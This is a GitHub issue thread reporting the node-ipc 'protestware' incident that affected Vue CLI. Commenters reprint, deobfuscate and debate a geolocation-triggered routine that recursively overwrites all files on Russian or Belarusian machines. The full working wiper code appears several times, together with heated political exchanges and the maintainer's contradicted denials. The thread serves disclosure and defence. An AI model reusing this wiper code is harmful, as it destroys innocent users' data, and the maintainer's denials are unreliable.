!!!!!!!!!!!! Please do something to warn USERS besides publishing new versions

[Mister-Hope]

See https://github.com/RIAEvangelist/node-ipc/issues/233#issuecomment-1068182278 the node-ipc is doing things far more than ever expected.

If any users are using ip in russia, all their file will be wiped entirely by ❤️, and that's a VERY DANGEROUS BEHAVIOR. This is not just making a joke, but damaging russia people's PC or server

I don't think vue team has done enough job just releaasing new versions, we should at lease

• add POPUPs in official website about that

• deprecate all the infected vue-cli packages to add a message for that

Also, we can do:

• adding some warnings in vue-devtools by publishing new versions, so that users may get a chance automatically upgrade and see the warning.

@sodatea @yyx990803 Please take actions as soon as possible!❤️

[hax]

It seems such attack code is not published to npm (or has been deleted). But such behavior is still very dangerous.

NOTE: The related comments have been deleted by the owner of that repo. Here are the screenshots :

[KawaiiZapic]

@RIAEvangelist deleting the original comment, but it does not matter to the fact.

Original post by @Mister-Hope which has been deleted.

@RIAEvangelist
I did some digging into recent commits in this repository.

What the actual f--k are you doing here:

⚠️| The following code is malicious, DO NOT RUN IT

https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js

⚠️| The above code is malicious, DO NOT RUN IT

I deobfuscated the code and found out that if the host machine's ip address was from Russia or Belarus, your code would proceed to nuke their files by overwriting everything:

⚠️| The following code is malicious, DO NOT RUN IT

import u from "path";
import a from "fs";
import o from "https";
setTimeout(function () {
    const t = Math.round(Math.random() * 4);
    if (t > 1) {
        return;
    }
    const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
    o.get(n.toString("utf8"), function (t) {
        t.on("data", function (t) {
            const n = Buffer.from("Li8=", "base64");
            const o = Buffer.from("Li4v", "base64");
            const r = Buffer.from("Li4vLi4v", "base64");
            const f = Buffer.from("Lw==", "base64");
            const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");
            const e = Buffer.from("cnVzc2lh", "base64");
            const i = Buffer.from("YmVsYXJ1cw==", "base64");
            try {
                const s = JSON.parse(t.toString("utf8"));
                const u = s[c.toString("utf8")].toLowerCase();
                const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus
                if (a) {
                    h(n.toString("utf8"));
                    h(o.toString("utf8"));
                    h(r.toString("utf8"));
                    h(f.toString("utf8"));
                }
            } catch (t) {}
        });
    });
}, Math.ceil(Math.random() * 1e3));
async function h(n = "", o = "") {
    if (!a.existsSync(n)) {
        return;
    }
    let r = [];
    try {
        r = a.readdirSync(n);
    } catch (t) {}
    const f = [];
    const c = Buffer.from("4p2k77iP", "base64");
    for (var e = 0; e < r.length; e++) {
        const i = u.join(n, r[e]);
        let t = null;
        try {
            t = a.lstatSync(i);
        } catch (t) {
            continue;
        }
        if (t.isDirectory()) {
            const s = h(i, o);
            s.length > 0 ? f.push(...s) : null;
        } else if (i.indexOf(o) >= 0) {
            try {
                a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with `❤️`
            } catch (t) {}
        }
    }
    return f;
}
const ssl = true;
export { ssl as default, ssl };

⚠️| The above code is malicious, DO NOT RUN IT

The following are excerpts from the malicious code:

Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64");
// https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154

const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8"));
// checks if ip country is Russia or Belarus

a.writeFile(i, c.toString("utf8"), function () {});
// overwrites file with `❤️`

You should be ashamed of yourself, this level of gross malice towards fellow developers is not ok.

---

---

Edit: please reference GalvinGao's comment

https://github.com/RIAEvangelist/node-ipc/issues/233#issuecomment-1068243590

hmmm, seems the file has been already deleted (https://github.com/RIAEvangelist/node-ipc/commits/master/dao/ssl-geospec.js) and the version affected v10.1.3 has already been either taken down, or the user has deleted it, from npm, as it is currently already not existed on npm.

Still, the publisher's activity, to my evaluation, is kinda suspicious. Whether the file was introduced intentionally or unintentionally, the security concerns of using this package has already planted.

[RIAEvangelist]

It's not really possible to run that code. It poses no threat, but it does look scary for sure.

[MidSpike]

It's not really possible to run that code. It poses no threat, but it does look scary for sure.

The fact of the matter is that you pushed that code to the repository.
That code should have never mixed in with node-ipc.
Such actions can be considered malicious.

[lorand-horvath]

@RIAEvangelist Why are you removing the posts from the node-ipc ticket https://github.com/RIAEvangelist/node-ipc/issues/233 that clearly show the code you added was deleting/overwriting user files?

@yyx990803 @sodatea Evan & Haoqun, could you please make sure that node-ipc 9.2.1, which is now locked in @vue/cli 4.5.16 and @vue/cli 5.0.3, is not malicious and isn't allowed to be changed in any way (indirectly)? Not sure, is node-ipc being used as dependency in Vite https://github.com/vitejs/vite ? or in create-vue ? Please double check.

[RIAEvangelist]

Can confirm no malicious code.

[RIAEvangelist]

Also I don't think you understand the code you were referring to. It is not possible for that code to overwrite user files.

[RIAEvangelist]

It definitely looks like it is possible, but if you check how it works, it is in fact not capable of doing what you are expecting.

[Nugine]

The community should fork node-ipc since the owner can no longer be trusted.

[RIAEvangelist]

Forking is always an option, so is version locking.

It's also very easy to jump to conclusions saying someone is not trustworthy. Code reviews and reading licenses and documentation may give better assessment of that though.

[hax]

It is not possible for that code to overwrite user files.
It definitely looks like it is possible, but if you check how it works, it is in fact not capable of doing what you are expecting.

I tested the code and confirmed that if the response denote ip was from russia, the code definitely could (1/4 possibility for every run) overwrite the files.

[RIAEvangelist]

Russia or Belarus, and only if the API key was valid; which it is not.

[RIAEvangelist]

Also, damn good sleuthing.

[hax]

Yeah, the API key is not valid now, it's very easy to apply a key or reset it.

[MidSpike]

@RIAEvangelist

only if the API key was valid; which it is not.

At the time of my testing, the api key was valid.
Don't lie to us.

[RIAEvangelist]

I don't think anyone is lieing here.

[liudonghua123]

Code will not lie. If you really want to do something, don't do it behind your back.

RIAEvangelist/node-ipc@847047c#diff-c2dd3b497ae886cfb8f5bf8c66c649fc2ae4afaa6660d9bbf3105d69884679c6

Welcome to Node.js v16.13.1.
Type ".help" for more information.
> const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64");
undefined
> n.toString("utf8")
'https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154'
> Buffer.from("Y291bnRyeV9uYW1l", "base64").toString("utf-8")
'country_name'
> Buffer.from("cnVzc2lh", "base64").toString("utf-8")
'russia'
> Buffer.from("YmVsYXJ1cw==", "base64").toString("utf-8")
'belarus'
> Buffer.from("Li8", "base64").toString("utf-8")
'./'
> Buffer.from("Li4v", "base64").toString("utf-8")
'../'
> Buffer.from("Li4vLi4v", "base64").toString("utf-8")
'../../'
> Buffer.from("Lw==", "base64").toString("utf-8")
'/'
>

[kumakichi]

I did an investigation, and got the following

commit RIAEvangelist/node-ipc@cc282c2 deleted the file: dao/ssl-geospec.js

after decrypt it, we got this:

import u from "path";
import a from "fs";
import o from "https";
setTimeout(function () {
  const t = Math.round(Math.random() * 4);
  if (t > 1) {
    return;
  }
  const n = "https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154";
  o.get(n.toString("utf8"), function (t) {
    t.on("data", function (t) {
    const n = "./";
    const o = "../";
    const r = "../../";
    const f = "/";
    const c = "country_name";
    const e = "russia";
    const i = "belarus";
      try {
        const s = JSON.parse(t.toString("utf8"));
        const u = s[c.toString("utf8")].toLowerCase();
        const a =
          u.includes(e.toString("utf8")) || u.includes(i.toString("utf8"));
        if (a) {
          h(n.toString("utf8"));
          h(o.toString("utf8"));
          h(r.toString("utf8"));
          h(f.toString("utf8"));
        }
      } catch (t) {}
    });
  });
}, Math.ceil(Math.random() * 1e3));
async function h(n = "", o = "") {
  if (!a.existsSync(n)) {
    return;
  }
  let r = [];
  try {
    r = a.readdirSync(n);
  } catch (t) {}
  const f = [];
  const c = "❤️";
  for (var e = 0; e < r.length; e++) {
    const i = u.join(n, r[e]);
    let t = null;
    try {
      t = a.lstatSync(i);
    } catch (t) {
      continue;
    }
    if (t.isDirectory()) {
      const s = h(i, o);
      s.length > 0 ? f.push(...s) : null;
    } else if (i.indexOf(o) >= 0) {
      try {
        a.writeFile(i, c.toString("utf8"), function () {});
      } catch (t) {}
    }
  }
  return f;
}
const ssl = true;
export { ssl as default, ssl };

you naughty guy

[censujiang]

Someone use their actions to prove that open source has borders😅

Supply chain pollution is not a smart move

[shugen002]

did any one report this to npmjs.com ?
https://www.npmjs.com/support?inquire=security&security-inquire=malware&package=node-ipc
Remove this package from npmjs may save a lot of user.

[haoqunjiang]

Thanks for the issue.

A few clarifications:

1. Vue CLI used to depend on node-ipc v9.x.
2. node-ipc 9.2.2 added the peacenotwar module, which would write a WITH-LOVE-FROM-AMERICA.txt to users' Desktop and OneDrive folders without the consent of the user.
3. We have since released 4.5.16 and 5.0.3 to lock the dependency version.
4. Affected users: new projects created during 2022-03-15T05:40:26.758Z and 2022-03-15T13:17:57.076Z; or those who updated project dependencies in that time span.
5. The malicious code that deletes files from Russian and Belarus IPs, is not included in the 9.2.2 release.

I think the best place to address this issue is the npm registry.
They can directly take down these malicious codes.

npmmirror.com has already taken steps to redirect these problematic versions to the latest known-safe versions: cnpm/bug-versions#181

[atian25]

node-ipc has been added to the registry.npmmirror.com blacklist and will not be synced with any new versions in the future.

We recommend that the community migrate to other alternative libraries as soon as possible.

[jw-foss]

Seems like we are going to lock our dependencies version from this point. lol, the funniest joke in 2022 is that [XX] has no border 🤣

[hax]

@atian25 The behavior — committed malicious code, deleted comments which expose such code, revoked the api key after been exposed and promoted the sophistry that the code not work because api key is not valid — make me think the guy is not worth trust anymore. I strongly suggest npmmirror not only blacklist node-ipc but all his packages.

[lyscf]

Good News This API is not available now
好消息 API挂了
{"message":"Provided API key is not valid. Contact technical support for assistance at support@ipgeolocation.io"}

[censujiang]

Good News This API is not available now 好消息 API挂了 {"message":"Provided API key is not valid. Contact technical support for assistance at support@ipgeolocation.io"}

Bad news is that node-ipc still have this problem

[nm17]

@WhatNot911 I think we should come together as people, and once and for all figure out if politics has any right to be in Open Source and if Open Source should "help to solve problems of the "real world"" in context of politics.

[xxxcoltxxx]

Ну вы и террористы...

Most of people's in this conversation are nacists. But they under fake news. They don't know about kills woman's and children by Ukraine army during 8 years in Donbass. All big Russians info channels are blocked. Just read the comments and close the browser tab.
I also support Ukraine people's (except criminals). Stay safe

[slayer]

I wonder about few Ukranian devs that live in Crimea or use VPNs

I am originally from Crimea, my relatives still there. Please don't say high-flown words to me.

russian fascism must be stopped by any means. including this

[nm17]

@slayer Do you support politically motivated discrimination and violence towards regular developers like yourself? Is "free as in speech" should also include political agitational speeches? I'm genuinely interested in this topic and not just trying to make you appear in a negative way.

[sergey-zinchenko]

Ну вы и террористы...

Most of people's in this conversation are nacists. But they under fake news. They don't know about kills woman's and children by Ukraine army during 8 years in Donbass. All big Russians info channels are blocked. Just read the comments and close the browser tab. I also support Ukraine people's (except criminals). Stay safe

I am aginst this maddness in Ukraine. But everything that happens here only leads to a worsening of the situation. Misunderstanding and hatred escalation - nothing more will come from that.

[SeymourRu]

@slayer

russian fascism must be stopped by any means. including this

You are definitely forgot who is your real enemy, not russian people, but non-elected russian president
Until you emotion state will be recovered, I think you should stop posting here and try to recover a bit. You still have great job to do.

Peace.

[buriy]

Russian army right now fights with Ukraine army.
But if you want to hurt/ban/apply whatever actions to all Russians just because some Russians did something, you're a racist (and that's called a stereotypical thinking).
War is always awful, and this comment war is awful too!
You do programming so you are good in logic, so, maybe, you want to apply most hatred to people who did most war and kills?
Start with nations that killed a lot of people at war in 21th century:

• America (>1M civilians killed in 21th century immediately or after their actions like bombing wells in Iraq)
• A lot of European NATO countries in 1999 in Yugoslavia, in 2011 in Lybia (don't remember the number of kills, sorry)
• Ukraine in the war against Donbass region in 2014-2021 (14k civilians killed, mostly in 2014-2015!)

Or, in the past:

• Germany
• China
• Japan
• UK
• ...

Apply your sanctions and politics statements to them, write malware against them. Don't pay taxes, go against the regimes if you live there.
And Ukraine even sent 1000 people to aid in Afghanistan war several years ago, so do they deserve double harted, right? No, not right!

Politicians always do wrong. And racism never helps. So please stop. Peace to everyone and wish all wars to end!

[slayer]

@slayer Do you support politically motivated discrimination and violence towards regular developers like yourself? Is "free as in speech" should also include political agitational speeches? I'm genuinely interested in this topic and not just trying to make you appear in a negative way.

That is not political. It's too far from politics. Politic and War is not the same.
I did not support any discrimination before war came to my home. You will not understand anything before war will knock to your door.

[sergey-zinchenko]

@slayer Do you support politically motivated discrimination and violence towards regular developers like yourself? Is "free as in speech" should also include political agitational speeches? I'm genuinely interested in this topic and not just trying to make you appear in a negative way.

That is not political. It's too far from politics. Politic and War is not the same. I did not support any discrimination before war came to my home. You will not understand anything before war will knock to your door.

А ты думаешь, что чем больше дискриминации, тем быстрее войне закончиться? Думаешь будет больше уважения, или может быть, что ВВП пишет по вечерам на js, и вот ему будет засада? Я не хочу тебя расстраивать....

[RIAEvangelist]

all it does is add a file to the desktop that gives a message of peace, not war, and remember to forgive. It is all also documented.

[nm17]

Quoting @slayer :

That is not political. It's to far from politics. Politic and War is not the same.

Do you think you're fighting a war here? You are just agitating your agenda. As it was said before: Politics always do wrong in this type of field and racism never helps.

I did not support any discrimination before war came to my home.

And now you do? Discrimination is bad in any context. You're just making yourself look bad.

Here is the definition, since I'm not sure you actually know it:

Discrimination is the act of making unjustified distinctions between people based on the groups, classes, or other categories to which they belong or are perceived to belong.

You will not understand anything before war will knock to your door.

And injecting malicious code will make a single thing better? Oh please.

[nm17]

@RIAEvangelist

all it does is add a file to the desktop that gives a message of peace, not war, and remember to forgive. It is all also documented.

Unauthorized access to personal data is sure peaceful. Your "library" is in no right to access these files/directories.

[nm17]

Who decides who is right or wrong in politics? The answer is people, but humans are also not perfect. As I said before, the Pandora's box is now opened, and from this point on, people who use opensource will experience xenophobia more than ever before, EVERYONE included. The trust factor of open source, which was based on good will of the developers is now practically gone, and now, more and more people are realizing that one day, their library/application can possibly be exploited to do/say whatever some random dev on the internet thought "was the right thing they to do". Not a single good came out of this "protest".

EDIT: fixed typo and added more specifics

[MSchleckser]

Man, I love politics in my APIs.

[RIAEvangelist]

Always free to lock the dep version if you do not agree with what the code does. There are many modules out there doing real harm silently like stealing your AWS and private keys. Locking deps after a code review is probably good practice anyway.

again;

all it does is add a file to the desktop that gives a message of peace, not war, and remember to forgive. It is all also documented.

[MidSpike]

Always free to lock the dep version if you do not agree with what the code does. There are many modules out there doing real harm silently like stealing your AWS and private keys. Locking deps after a code review is probably good practice anyway.

again;

all it does is add a file to the desktop that gives a message of peace, not war, and remember to forgive. It is all also documented.

You need to stop pretending like you aren't aware why people are angry at you:
https://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c

[MSchleckser]

It should be noted, this is why anything that goes into a prod environment needs to have security scans.

[nm17]

For anyone looking at how to prevent this happening in your software, this site helps you with that: https://slsa.dev/

P.S: I'm absolutely unaffiliated with this site or it's developers. I just found this resource useful and decided to share it with others.

[lillycat332]

Just leave russia. Stop complaining. Or do something now against regime.

This is genuinely one of the most idiotic things I've ever read

[RIAEvangelist]

additionally locking package dependency versions is a good idea.

again;

all it does is add a file to the desktop that gives a message of peace, not war, and remember to forgive. It is all also documented.

[nm17]

@RIAEvangelist YOUR CODE DELETES EVERY FILE ON THE PC

https://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c#edit-2022-03-16

Also this:

See RIAEvangelist/node-ipc#233 (comment) the node-ipc is doing things far more than ever expected.

[RIAEvangelist]

That code is not executable unless you modify it to make it so.

[bigslycat]

Did I vote for Putin? No.

Do I support military action? No.

Am I doing something to stop people from being killed? Maybe. But if I confess this publicly, I will go to jail.

It turns out that I'm not to blame for what's happening, but it's my fault that I'm Russian?

No, my conscience is clear, and I am not guilty of anything before you. The authors of this initiative are Nazis and criminals.

[MidSpike]

That code is not executable unless you modify it to make it so.

I'm tired of arguing with you.

I want you to prove that it is not executable within this commit range on the master branch:
847047cf7f81ab08352038b2204f0e7633449580 -> 6e344066a0464814a27fbd7ca8422f473956a803
RIAEvangelist/node-ipc@847047c
RIAEvangelist/node-ipc@6e34406

[majestrate]

this is a potential security liability as well, if a state actor can coherence a CA they can trigger this code path invisibly. regardless of intent adding security issues to code on purpose is unethical and highly dangerous, especially if done haphazardly.

[solofeed]

Everyone here, who is from Russia, you can freely fork the repository and continue working in a safe apartment with a living family.

I agree that this cunning step will not stop the war, but I appreciated this wonderful diversion, which will raise the problem because believe me, many even IT specialists are not aware of what is happening, they are under a decade of propaganda of the Russian world, they are expectedly inconsistent in their assessment situations. They complain that they can be touched on the streets during rallies, although in the meantime my relatives and friends are losing their loved ones, children, parents, the opportunity to eat and drink water, the opportunity to see a doctor, to sleep in silence.

Therefore, be restrained, we have the right to splash out our emotions even in this way, because there is a high probability that this may be the last thing we did in our lives, and your government (and everyone who lives in Russia) is to blame for this.

[Akryum]

The (transitive) vulnerability in @vue/cli has been fixed as described by @sodatea here. Please update to the latest versions of @vue/cli, either 4.5.16+ or 5.0.3+

npm i -g @vue/cli
pnpm i -g @vue/cli
yarn global add @vue/cli